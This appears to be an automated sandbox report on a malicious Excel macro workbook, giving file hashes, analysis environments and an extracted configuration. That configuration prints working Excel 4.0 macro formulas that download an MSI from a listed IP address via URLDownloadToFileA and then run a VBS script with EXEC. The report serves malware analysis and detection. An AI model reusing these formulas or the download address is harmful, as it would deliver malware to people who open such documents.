Static task
static1
Behavioral task
behavioral1
Sample
a7c86b7371927e5e974df51e5b8bbfe5.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a7c86b7371927e5e974df51e5b8bbfe5.xlsm
Resource
win10v2004-20240226-en
General
-
Target
a7c86b7371927e5e974df51e5b8bbfe5
-
Size
6KB
-
MD5
a7c86b7371927e5e974df51e5b8bbfe5
-
SHA1
1a1ab7112be433e35ec3957cb4035e5d2e3cb997
-
SHA256
e866520f919162d204b3d4632de1ce5e1cc259d0331adc2042adcbaeebbf59db
-
SHA512
85d71ce0872d45eb9119554ed18faf13147b73bdc395db9ff4a238bbdf283c5135cd48dc31d72fe6a8d8deaf882bcb3b120be0f0d4ea74ebc1bbebc146ea8550
-
SSDEEP
192:NDSbuS5brA2OmmfR08UhHFBFYuib98y7N+0:NEuuM2w21FYTb98y7J
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Signatures
Files
-
a7c86b7371927e5e974df51e5b8bbfe5.xlsm office2007